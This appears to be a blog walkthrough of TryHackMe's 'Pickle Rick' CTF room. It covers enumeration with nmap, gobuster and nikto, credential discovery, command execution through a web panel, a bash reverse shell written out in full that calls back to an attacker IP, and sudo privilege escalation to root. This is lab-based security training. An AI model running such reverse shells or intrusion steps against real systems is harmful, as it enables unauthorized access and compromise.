Pickle Rick Room Walkthrough on TryHackMe

A Rick and Morty CTF. Help turn Rick back into a human!

Pickle Rick

The Pickle Rick room on TryHackMe is a beginner-friendly penetration testing challenge that allows you to practice your skills and apply what you have learned. In this walkthrough, I will guide you through the process of completing the Pickle Rick room and explain the different steps involved.

Introduction

To get started, you will need to sign up for a TryHackMe account and then access the Pickle Rick room. Read the introduction and objectives of the room, and then click on the “Start” button to begin the challenge.

TryHackMe | Pickle Rick

Reconnaissance

The first step in any penetration testing engagement is reconnaissance. This step involves gathering information about the target system and the services that are running on it. For this challenge, you will need to use Nmap to perform a scan of the target system. To do this, you can use the following command:

nmap -sV <target_ip>

nmap scan result

Once you have run the scan, examine the output to identify the services that are running on the target system and take note of any open ports.

Results: ssh: 22/tcp & HTTP: 80/tcp open

Enumeration

Let’s use Gobuster to look for directories in our WebApp.If you’re using the THM attack box, the wordlist is located at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.

gobuster dir -u < HTTP:// Target IP > -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php

This command will look for all files with the extensions ".php" and ".html" on the target application.

Website Exploration

According to our Nmap scan, the web server is on port 80.

So Let’s go to our target website by using http://TARGET IP.
This page warmly welcomes us:

Our target website welcome page

Viewing the page source reveals something interesting.

Username: R1ckRul3s

Viewing the page source

Now, we can use a web server scanner to see if there are any vulnerabilities that we could exploit. Nikto can be used for this.

Command : nikto -host < HTTP:// Target IP >

According to Nikto, the Robots.txt file does not contain “disallow” entries and does not follow the standard format.

During the directory brute-force attack, we discovered a page called login.php. Let’s go check it out. The Portal Login Page will then appear.

The Portal Login Page

The username (R1ckRul3s) is known, but what about the password? We must investigate our enumeration findings in order to find it. Remember that robots.txt file we found? Nikto pointed out that it appeared strange. Let’s take a look and try it.

Great! A new page called the Command Panel will then appear.

We can use the ls command to see if there are any files, one of which is a secret ingredient.

Then let’s try the cat command for the file’s contents. However, there was an error when using the cat command.

So let’s try a different command: less. Less is a Linux terminal pager that displays the contents of a file one screen at a time.

Great ! We got the First ingredient Rick needs

Now we can try to concatenate other directories by using this command panel. The directory contained a clue.txt file. Let’s read the contents of it with the same less command.

There is a note that says, “Look around the file system for the other ingredient.” And it means we have to keep digging.

Reverse Shell

Let’s see if we can get a shell in our system by running netcat.

Netcat (nc) is a versatile networking tool that can be used to perform various tasks, such as sending and receiving data, creating backdoors, and scanning ports.

This is when we decided to launch a reverse shell by running a reverse shell script from the command section.

Before running the reverse shell script command on the web application, we started a Netcat listener.

Now we can run our reverse shell script command on the web application.

You can easily find a Bash reverse shell from; https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Reverse shell bash script : bash -c ‘bash -i >& /dev/tcp/10.18.62.149/8080 0>&1’

On the target machine, we had a reverse shell, as shown below.

We can use the ls command to see if there are any files, one of which is a secret ingredient.

Now we have a stable Shell. As a result, we can easily obtain all of the flags by concatenating these files or navigating to our users.

We have successfully obtained the second ingredient. But the problem is that access to the "root" is denied.

Privilege Escalation

We look for sudo privileges for the www-data user. As we can see, it can execute all commands as root. To obtain the root shell, we use the sudo command in conjunction with bash. We were able to gain access to the machine’s root shell. We then read the Third Ingredient and exploit the machine.

Congratulations!

Conclusion

The Pickle Rick room on TryHackMe is a great way to practice your penetration testing skills and apply what you have learned. By following this walkthrough, you should be able to complete the challenge and gain a deeper understanding of the various steps involved in a penetration testing engagement. Good luck! Happy Hacking!